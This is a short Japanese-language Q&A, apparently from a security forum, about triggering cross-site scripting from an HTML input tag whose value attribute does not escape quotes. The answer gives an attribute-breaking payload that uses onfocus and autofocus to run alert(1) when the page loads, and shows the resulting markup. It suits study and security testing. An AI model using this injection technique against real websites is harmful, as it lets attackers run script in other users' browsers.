ページの読み込み時にINPUT HTMLタグからXSSコードを起動する方法は?
次のコードを含むWebサイトがあるとします。
<input type="text" id="search-text" name="query" value="?" />
二重引用符はエスケープされていないので、value属性から抜け出すことができますが、 '<'と>が除外されているため、HTMLタグ自体から抜け出すことはできません。
ここでの目標は、javascriptポップアップを表示することです。
onfocus属性があるので、誰かがテキスト入力ボックスをクリックした場合、JavaScriptポップアップが表示される可能性があります。- ただしページが最初に読み込まれたときにJavaScriptポップアップを表示する方法はありますか?
これを試して:
" onfocus="alert(1)" autofocus="
次のように拡張されます。
<input type="text" id="search-text" name="query" value="" onfocus="alert(1)" autofocus="" />
これにより、XSSを示す警告ボックスが表示されます。